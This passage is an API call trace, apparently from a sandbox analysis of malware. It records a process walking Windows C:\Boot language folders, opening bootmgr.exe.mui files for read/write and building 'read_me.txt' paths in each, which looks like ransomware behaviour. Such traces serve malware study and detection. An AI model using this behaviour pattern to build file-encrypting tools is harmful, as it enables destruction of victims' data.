ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0075.020] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\.") returned 19 [0075.020] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0075.020] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\..") returned 20 [0075.020] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0075.020] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui") returned 33 [0075.020] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ja-JP\\bootmgr.exe.mui" (normalized: "c:\\boot\\ja-jp\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0075.020] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0075.020] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0075.020] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP\\read_me.txt") returned 29 [0075.020] GetProcessHeap () returned 0x4f10000 [0075.020] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8a90050 | out: hHeap=0x4f10000) returned 1 [0075.020] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 13 [0075.020] GetProcessHeap () returned 0x4f10000 [0075.020] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ab0060 | out: hHeap=0x4f10000) returned 1 [0075.023] GetProcessHeap () returned 0x4f10000 [0075.023] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8a90050 [0075.023] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\*") returned 19 [0075.023] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ko-KR\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0075.023] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\.") returned 19 [0075.023] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0075.023] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\..") returned 20 [0075.023] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0075.023] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui") returned 33 [0075.023] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\ko-KR\\bootmgr.exe.mui" (normalized: "c:\\boot\\ko-kr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0075.024] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0075.024] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0075.024] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR\\read_me.txt") returned 29 [0075.024] GetProcessHeap () returned 0x4f10000 [0075.024] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8a90050 | out: hHeap=0x4f10000) returned 1 [0075.024] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 14 [0075.024] GetProcessHeap () returned 0x4f10000 [0075.024] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ab0060 | out: hHeap=0x4f10000) returned 1 [0075.027] GetProcessHeap () returned 0x4f10000 [0075.027] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8a90050 [0075.027] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\*") returned 19 [0075.027] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\nb-NO\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0075.027] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\.") returned 19 [0075.027] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0075.027] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\..") returned 20 [0075.027] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0075.027] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui") returned 33 [0075.027] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nb-NO\\bootmgr.exe.mui" (normalized: "c:\\boot\\nb-no\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0075.028] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0075.028] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0075.028] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO\\read_me.txt") returned 29 [0075.028] GetProcessHeap () returned 0x4f10000 [0075.028] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8a90050 | out: hHeap=0x4f10000) returned 1 [0075.028] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 15 [0075.028] GetProcessHeap () returned 0x4f10000 [0075.028] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ab0060 | out: hHeap=0x4f10000) returned 1 [0075.030] GetProcessHeap () returned 0x4f10000 [0075.031] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8a90050 [0075.031] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\*") returned 19 [0075.031] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\nl-NL\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0075.031] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\.") returned 19 [0075.031] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0075.031] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\..") returned 20 [0075.031] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0075.031] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui") returned 33 [0075.031] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\nl-NL\\bootmgr.exe.mui" (normalized: "c:\\boot\\nl-nl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0075.031] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0075.031] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0075.031] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL\\read_me.txt") returned 29 [0075.031] GetProcessHeap () returned 0x4f10000 [0075.031] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8a90050 | out: hHeap=0x4f10000) returned 1 [0075.031] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 16 [0075.031] GetProcessHeap () returned 0x4f10000 [0075.031] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ab0060 | out: hHeap=0x4f10000) returned 1 [0075.034] GetProcessHeap () returned 0x4f10000 [0075.034] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8a90050 [0075.034] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\*") returned 19 [0075.034] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pl-PL\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0075.034] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\.") returned 19 [0075.034] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0075.034] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\..") returned 20 [0075.034] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0075.034] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui") returned 33 [0075.034] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pl-PL\\bootmgr.exe.mui" (normalized: "c:\\boot\\pl-pl\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0075.035] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0075.035] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0075.035] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL\\read_me.txt") returned 29 [0075.035] GetProcessHeap () returned 0x4f10000 [0075.035] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8a90050 | out: hHeap=0x4f10000) returned 1 [0075.035] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 17 [0075.035] GetProcessHeap () returned 0x4f10000 [0075.035] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ab0060 | out: hHeap=0x4f10000) returned 1 [0075.038] GetProcessHeap () returned 0x4f10000 [0075.038] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8a90050 [0075.038] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\*") returned 19 [0075.038] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pt-BR\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0075.038] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\.") returned 19 [0075.038] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0075.038] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\..") returned 20 [0075.039] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0075.039] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui") returned 33 [0075.039] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\pt-BR\\bootmgr.exe.mui" (normalized: "c:\\boot\\pt-br\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0075.039] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0075.039] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0075.039] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR\\read_me.txt") returned 29 [0075.039] GetProcessHeap () returned 0x4f10000 [0075.039] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8a90050 | out: hHeap=0x4f10000) returned 1 [0075.039] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 18 [0075.039] GetProcessHeap () returned 0x4f10000 [0075.039] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ab0060 | out: hHeap=0x4f10000) returned 1 [0075.041] GetProcessHeap () returned 0x4f10000 [0075.041] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8a90050 [0075.041] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\*") returned 19 [0075.041] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pt-PT\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0075.042] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\.") returned 19 [0075.042] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0075.042] wnsprintfW (in: pszDest=0x8a90050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT\\..") returned 20 [0075.042] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0x4f10000, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0075.042] wnsprintfW (in: 